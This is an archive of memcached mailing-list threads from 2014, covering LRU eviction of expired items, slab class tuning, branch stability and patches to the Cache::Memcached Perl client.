We have like 200GB of data evicted this way, daily. Because of volume (~40k req/s peak, much of it are writes) and differences in expire time LRU isn't able to reclaim items efficiently. Maybe people don't even realize the problem, but when we done some testing and turned off that custom eviction we had like 100% memory used with 10% of waste reported by memcached admin. But then we run that custom eviction algorithm it turned out that 90% of memory is occupied by garbage. Waste reported grew to 80% instantly after running unlimited reclaim expired on all items in the cache. So in standard client when people will be using different expire times for items (we have it like 1minute minimum, 6h max)... they even won't be able to see how much memory they're wasting in some specific cases, when they'll have many items that won't be hit after expiration, like we have. When using memcached as a buffer for mysql writes, we know exactly what to hit and when. Short TTL expired items, pile up near the head... long TTL live items pile up near the tail and it's creating a barrier that prevents the LRU algo to reclaim almost anything, if im getting how it currently works, correctly... You made it sound like you had some data which never expired? Is this true? Yes, i think because of how evictions are made (to be clear we're not setting non-expiring items). These short expiring items pile up in the front of linked list, something that is supposed to live for eg. 120 or 180 seconds is lingering in memory forever, untill we restart the cache... and new items are killed
Re: Idea for reclaimation algo
s/pagging/padding/. gah. On Fri, 11 Apr 2014, dormando wrote: On Fri, 11 Apr 2014, Slawomir Pryczek wrote: Hi Dormando, more about the behaviour... when we're using normal memcached 1.4.13 16GB of memory gets exhausted in ~1h, then we start to have almost instant evictions of needed items (again these items aren't really needed individually, just when many of them gets evicted it's unacceptable because of how badly it affects the system) Almost instant evictions; so an item is stored, into a 16GB instance, and 120 seconds later is bumped out of the LRU? You'll probably just ignore me again, but isn't this just slab imbalance? Once your instance fills up there're probably a few slab classes with way too little memory in them. 'stats slabs' shows you per-slab eviction rates, along with the last accessed time of an item when it was evicted. What does this look like on one of your full instances? The slab rebalance system lets you plug in your own algorithm by running the page reassignment commands manually. Then you can smooth out the pages to where you think they should be. You mention long and short TTL, but what are they exactly? 120s and an hour? A week? I understand your desire to hack up something to solve this, but as you've already seen scanning memory to remove expired items is problematic: you're either going to do long walks from the tail, use a background thread and walk a probe item through, or walk through random slab pages looking for expired memory. None of these are very efficient and tend to rely on luck. A better way to do this is to bucket the memory by TTL. You have lots of pretty decent options for this (and someone else already suggested one): - In your client, use different memcached pools for major TTL buckets (ie; one instance only gets long items, one only short). Make sure the slabs aren't imbalanced via the slab rebalancer. - Are the sizes of the items correlated with their TTL? Are 120s items always in a ~300 byte range and longer items tend to be in a different byte range? You could use length pagging to shunt them into specific slab classes, separating them internally at the cost of some ram efficiency. - A storage engine (god I wish we'd made 1.6 work...) which allows bucketing by TTL ranges. You'd want a smaller set of slab classes to not waste too much memory here, but the idea is the same as running multiple individual instances, except internally splitting the storage engine instead and storing everything in the same hash table. Those three options completely avoid latency problems, the first one requires no code modifications and will work very well. The third is the most work (and will be tricky due to things like slab rebalance, and none of the slab class identification code will work). I would avoid it unless I were really bored and wanted to maintain my own fork forever. ~2 years ago i created another version based on that 1.4.13, than does garbage collection using custom stats handler. That version is able to be running on half of the memory for like 2 weeks, with 0 evictions. But we gave it full 16G and just restart it each week to be sure memory usage is kept in check, and we're not throwing away good data. Actually after changing -f1.25 to -f1.041 the slabs are filling with bad items much slower, because items are distributed better and this custom eviction function is able to catch more expired data. We have like 200GB of data evicted this way, daily. Because of volume (~40k req/s peak, much of it are writes) and differences in expire time LRU isn't able to reclaim items efficiently. Maybe people don't even realize the problem, but when we done some testing and turned off that custom eviction we had like 100% memory used with 10% of waste reported by memcached admin. But then we run that custom eviction algorithm it turned out that 90% of memory is occupied by garbage. Waste reported grew to 80% instantly after running unlimited reclaim expired on all items in the cache. So in standard client when people will be using different expire times for items (we have it like 1minute minimum, 6h max)... they even won't be able to see how much memory they're wasting in some specific cases, when they'll have many items that won't be hit after expiration, like we have. When using memcached as a buffer for mysql writes, we know exactly what to hit and when. Short TTL expired items, pile up near the head... long TTL live items pile up near the tail and it's creating a barrier that prevents the LRU algo to reclaim almost anything, if im getting how it currently works, correctly... You made it sound like you had some data which never expired? Is this true? Yes, i think because of how evictions are made (to be clear we're not setting non-expiring items). These short expiring items pile up in the front of linked list, something
Re: Idea for reclaimation algo
Hey Dormando, thanks again for some comments... appreciate the help. Maybe i wasn't clear enough. I need only 1 minute persistence, and i can lose data sometimes, just i can't keep loosing data every minute due to constant evictions caused by LRU. Actually i have just wrote that in my previous post. We're loosing about 1 minute of non-meaningfull data every week because of restart that we do when memory starts to fill up (even with our patch reclaiming using linked list, we limit reclaiming to keep speed better)... so the memory fills up after a week, not 30 minutes... Can you explain what you're seeing in more detail? Your data only needs to persist for 1 minute, but it's being evicted before 1 minute is up? You made it sound like you had some data which never expired? Is this true? If your instance is 16GB, takes a week to fill up, but data only needs to persist for a minute but isn't, something else is very broken? Or am I still misunderstanding you? Now im creating better solution, to limit locking as linked list is getting bigger. I explained what was worst implications of unwanted evictions (or loosing all data in cache) in my use case: 1. loosing ~1 minute of non-significant data that's about to be stored in sql 2. flat distribution of load to workers (not taking response times into account because stats reset). 3. resorting to alternative targeting algorithm (with global, not local statistics). I never, ever said im going to write data that have to be persistent permanently. It's actually same idea as delayed write. If power fails you loose 5s of data, but you can do 100x more writes. So you need the data to be persistent in memory, between writes the data **can't be lost**. However you can lose it sometimes, that's the tradeoff that some people can make and some not. Obviously I can't keep loosing this data each minute, because if i loose much it'll become meaningfull. Maybe i wasn't clear in that matter. I can loose all data even 20 times a day. Sensitive data is stored using bulk update or transactions, bypassing that delayed write layer. 0 evictions, that's the kind of persistence im going for. So items are persistent for some very short periods of time (1-5 minutes) without being killed. It's just different use case. Running in production since 2 years, based on 1.4.13, tested for corectness, monitored so we have enough memory and 0 evictions (just reclaims) When i came here with same idea ~2 years ago you just said it's very stupid, now you even made me look like a moron :) And i can understand why you don't want features that are not ~O(1) perfectly, but please don't get so personal about different ideas to do things and use cases, just because these won't work for you. W dniu czwartek, 10 kwietnia 2014 20:53:12 UTC+2 użytkownik Dormando napisał: You really really really really really *must* not put data in memcached which you can't lose. Seriously, really don't do it. If you need persistence, try using a redis instance for the persistent stuff, and use memcached for your cache stuff. I don't see why you feel like you need to write your own thing, there're a lot of persistent key/value stores (kyotocabinet/etc?). They have a much lower request ceiling and don't handle the LRU/cache pattern as well, but that's why you can use both. Again, please please don't do it. You are damaging your company. You are a *danger* to your company. On Thu, 10 Apr 2014, Slawomir Pryczek wrote: Hi Dormando, thanks for suggestions, background thread would be nice... The idea is actually that with 2-3GB i get plenty of evictions of items that need to be fetched later. And with 16GB i still get evictions, actually probably i could throw more memory than 16G and it'd only result in more expired items sitting in the middle of slabs, forever... Now im going for persistence. Sounds probably crazy, but we're having some data that we can't loose: 1. statistics, we aggregate writes to DB using memcached (+list implementation). If these items get evicted we're loosing rows in db. Loosing data sometimes isn't a big problem. Eg. we restart memcached once a week so we're loosing 1 minute of data every week. But if we have evictions we're loosing data constantly (which we can't have) 2. we drive load balancer using data in memcached for statistics, again, not nice to loose data often because workers can get incorrect amount of traffic. 3. we're doing some adserving optimizations, eg. counting per-domain ad priority, for one domain it takes about 10 seconds to analyze all data and create list of ads, so can't be done online... we put result of this in memcached, if we loose too much of this the system will start
Re: Memcached version 1.4, 1.6
1.4 is the latest stable. 1.6 is a development branch. On Tue, 8 Apr 2014, Vakul Garg wrote: Hi Which is the latest memcached version (1.4 or 1.6)? I do not see engine-pu branch on memcached git. Is memcached version 1.6 deprecated? Regards Vakul -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Idea for reclaimation algo
Hi Guys, im running a specific case where i don't want (actually can't have) to have evicted items (evictions = 0 ideally)... now i have created some simple algo that lock the cache, goes through linked list and evicts items... it makes some problems, like 10-20ms cache locks on some cases. Now im thinking about going through each slab memory (slabs keep a list of allocated memory regions) ... looking for items, if expired item is found, evict it... this way i can go eg. 10k items or 1MB of memory at a time + pick slabs with high utilization and run this additional eviction only on them... so it'll prevent allocating memory just because unneded data with short TTL is occupying HEAD of the list. With this linked list eviction im able to run on 2-3GB of memory... without it 16GB of memory is exhausted in 1-2h and then memcached starts to kill good items (leaving expired ones wasting memory)... Any comments? Thanks. you're going a bit against the base algorithm. if stuff is falling out of 16GB of memory without ever being utilized again, why is that critical? Sounds like you're optimizing the numbers instead of actually tuning anything useful. That said, you can probably just extend the slab rebalance code. There's a hook in there (which I called Angry birds mode) that drives a slab rebalance when it'd otherwise run an eviction. That code already safely walks the slab page for unlocked memory and frees it; you could edit it slightly to check for expiration and then freelist it into the slab class instead. Since it's already a background thread you could further modify it to just wake up and walk pages for stuff to evict. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: memcached master branch - production safe?
just use master. On Tue, 8 Apr 2014, Slawomir Pryczek wrote: Is it safe to use master branch code in production enviroment? When adding changes to code i can just fork master and use that safely, or i'll need to make modifications on 1.4.17 code available from the website? I noticed there are some differences between 1.4.17 version and the code available on that branch... Thanks. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Setting slab class number.
It's not presently possible to do either. I would like to allow people to supply the slab classes specifically, but we haven't done it yet. 2000 slab classes has its own set of inefficiencies. You should still keep the number relatively low. On Wed, 2 Apr 2014, Slawomir Pryczek wrote: Hi guys, i noticed there's some limit in slab classes number. http://screencast.com/t/RqUovWXVLS Is it possible to have eg. 2000 slab classes? Alternatively, can i just set limit of all these individually, by typing eg. 200 tab separated numbers What i want to achieve is to have better distribuition of slabs, optimized for storing very small values 1. 10bytes 2. 11bytes [..] 100. 10kb 101. 15kb [..] 189. 100kb 190. 150kb etc. It seems that it isn't possible with current formula and -f attribute. Thanks, Slawomir. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: MemCached with Liighttpd
The memcached library that lighttpd uses, last I checked, was synchronous. Lighttpd is an async webserver, which means each time it needs to fetch something from memcached it will block the entire thing waiting for a response. It won't block very long, mind you, but it can't process in parallel. Unless you aren't talking about using memcached from *within* lighttpd, which then it probably doesn't matter. If you intend to push a ton of traffic it might bite you. If not, you'll be fine with it the way it is. On Sat, 22 Mar 2014, jResponse IDE wrote: Thank you, Ryan. On Sunday, March 23, 2014 2:31:36 AM UTC+1, Ryan McElroy wrote: Lots of people successfully have used both together, but they aren't closely related in any way that I'm aware of so I wouldn't expect any conflicts. Is there anything in particular you're worried about? The only thing I can think of is that a library you're using to access memcached might not support lighttpd for some reason, but you can probably verify that by reading up on your library and testing it before switching over. Best of luck! ~Ryan On Sat, Mar 22, 2014 at 1:57 PM, jResponse IDE jrespo...@gmail.com wrote: Am I likely to run into any nasty surprises using memcached with lighthttpd? I have used it often enough in a standard LAMP setup but I now need to move to a setup with Lighttpd and MariaDB on an Ubuntu 12.04 box. I would imagine that it will work but I thought it best to post here and verify. I'd be much obliged for any feedback. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Cache::Memcached updates / patches
On Wed, 12 Mar 2014, Joshua Miller wrote: On Wed, Mar 12, 2014 at 12:43 AM, dormando dorma...@rydia.net wrote: https://github.com/unrtst/Cache-Memcached/tree/20140223-patch-cas-support This started as just wanting to get a couple small features into Cache::Memcached, but I ended up squashing a bunch of bugs (and merging bugfixes from existing and old RT tickets), and kept adding features. The repo above includes: * benchmarks (to make sure i didn't slow it down) * utf8 key fixes * utf8 value support * compress_ratio * compress_methods * serialize_methods * hash_namespace * max_size * digest_keys_method and digest_keys_enable * digest_keys_threshold * touch * server_versions * cas, gets, gets_multi * cas patch for GetParserXS: https://github.com/unrtst/memcached/tree/master/trunk/api/xs/Cache-Memcached-GetParserXS All of those are available under Cache::Memcached::Fast except for the digest_keys* items. There's some public and open debates regarding whether or not using a digest as the key is a good idea, but I want to use it, and having the option is virtual free, so I included it. Cache::Memcached::Fast::Safe automatically uses a digest if the key length exceeds 200 characters, so it's not without precedent. I plan on adding ketama (aka consistent hash) support very soon. It's probably still advisable to point users to Cache::Memcached::Fast or Cache::Memcached::libmemcached, but fixing the bugs in this module and bringing it up to feature parity can't hurt. I almost wish I had given up on C:M and used one of the others instead, but this has been rewarding in its own way. It would be nice to see these make it to a CPAN release... anyone know who to reach out to for that (one of the RT tickets had said to come here)? I'd also welcome any additional review of the branch. Thank you, -- Josh I. I should probably just give the thing to you. Would you like me to review your work and cut releases or, what would be best? If you've got a little time, an extra pair of eyeballs never hurts. Otherwise, I'd be happy to co-maintain and cut releases (user unrtst on pause/cpan). -- Josh I. I'm not sure I do have time... I'll see about looking it over this weekend maybe. If they look sane I'll see about co-maint. Thanks for taking the time. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Cache::Memcached updates / patches
https://github.com/unrtst/Cache-Memcached/tree/20140223-patch-cas-support This started as just wanting to get a couple small features into Cache::Memcached, but I ended up squashing a bunch of bugs (and merging bugfixes from existing and old RT tickets), and kept adding features. The repo above includes: * benchmarks (to make sure i didn't slow it down) * utf8 key fixes * utf8 value support * compress_ratio * compress_methods * serialize_methods * hash_namespace * max_size * digest_keys_method and digest_keys_enable * digest_keys_threshold * touch * server_versions * cas, gets, gets_multi * cas patch for GetParserXS: https://github.com/unrtst/memcached/tree/master/trunk/api/xs/Cache-Memcached-GetParserXS All of those are available under Cache::Memcached::Fast except for the digest_keys* items. There's some public and open debates regarding whether or not using a digest as the key is a good idea, but I want to use it, and having the option is virtual free, so I included it. Cache::Memcached::Fast::Safe automatically uses a digest if the key length exceeds 200 characters, so it's not without precedent. I plan on adding ketama (aka consistent hash) support very soon. It's probably still advisable to point users to Cache::Memcached::Fast or Cache::Memcached::libmemcached, but fixing the bugs in this module and bringing it up to feature parity can't hurt. I almost wish I had given up on C:M and used one of the others instead, but this has been rewarding in its own way. It would be nice to see these make it to a CPAN release... anyone know who to reach out to for that (one of the RT tickets had said to come here)? I'd also welcome any additional review of the branch. Thank you, -- Josh I. I should probably just give the thing to you. Would you like me to review your work and cut releases or, what would be best? -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.